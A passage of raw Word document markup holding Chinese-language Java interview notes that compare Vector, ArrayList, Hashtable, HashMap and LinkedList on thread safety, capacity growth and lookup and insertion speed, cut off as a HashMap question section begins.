          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>备注：对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector&amp;ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hashtable&amp;HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，要记住线程安全的问题，记住</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是旧的，是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>一诞生就提供了的，它们是线程安全的，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>java2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>时才提供的，它们是线程不安全的。所以，我们讲课时先讲老的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10D38" w:rsidRPr="00F41A4C" w:rsidRDefault="00A10D38" w:rsidP="00A10D38">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="136" w:line="380" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）数据增长：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10D38" w:rsidRPr="00F41A4C" w:rsidRDefault="00A10D38" w:rsidP="00A10D38">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="136" w:line="380" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>都有一个初始的容量大小，当存储进它们里面的元素的个数超过了容量时，就需要增加</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的存储空间，每次要增加存储空间时，不是只增加一个存储单元，而是增加多个存储单元，每次增加的存储单元的个数在内存空间利用与程序效率之间要取得一定的平衡。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>默认增长为原来两倍，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的增长策略在文档中没有明确规定（从源代码看到的是增长为原来的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>倍）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>都可以设置初始的空间大小，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>还可以设置增长的空间大小，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>没有提供设置增长空间的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10D38" w:rsidRPr="00F41A4C" w:rsidRDefault="00A10D38" w:rsidP="00A10D38">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>总结：即</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>增长原来的一倍，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>增加原来的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>0.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>倍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10D38" w:rsidRPr="00F41A4C" w:rsidRDefault="00A10D38" w:rsidP="009C2CF5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00884CDC" w:rsidRPr="00F41A4C" w:rsidRDefault="00884CDC" w:rsidP="009C2CF5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00557138" w:rsidRPr="00F41A4C" w:rsidRDefault="00557138" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：数组形式保存对象，对象连续的位置中，插入删除比较麻烦</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00557138" w:rsidRPr="00F41A4C" w:rsidRDefault="00557138" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="0013773A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>查找速度快</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C4D49" w:rsidRPr="00F41A4C" w:rsidRDefault="00C779C5" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>采用双向链表实现</w:t>
      </w:r>
      <w:r w:rsidR="00AD1B5F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>存储</w:t>
      </w:r>
      <w:r w:rsidR="002C1B72" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，每个对象存储在独立的空间中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015575A" w:rsidRPr="00F41A4C" w:rsidRDefault="008C4D49" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r w:rsidR="00BF5F84" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>查找相对慢</w:t>
      </w:r>
      <w:r w:rsidR="0031728D" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，删除和新增比较占优势</w:t>
      </w:r>
      <w:r w:rsidR="004C3D32" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027153" w:rsidRPr="00341978" w:rsidRDefault="00BB3BCA" w:rsidP="00341978">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1.3  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关面试题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00935833" w:rsidRPr="00F44E9F" w:rsidRDefault="00341978" w:rsidP="00F44E9F">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidR="00935833" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  HashMap</w:t>
      </w:r>
      <w:r w:rsidR="00935833" w:rsidRPr="00F41A4C">
        <w:t>与</w:t>
      </w:r>
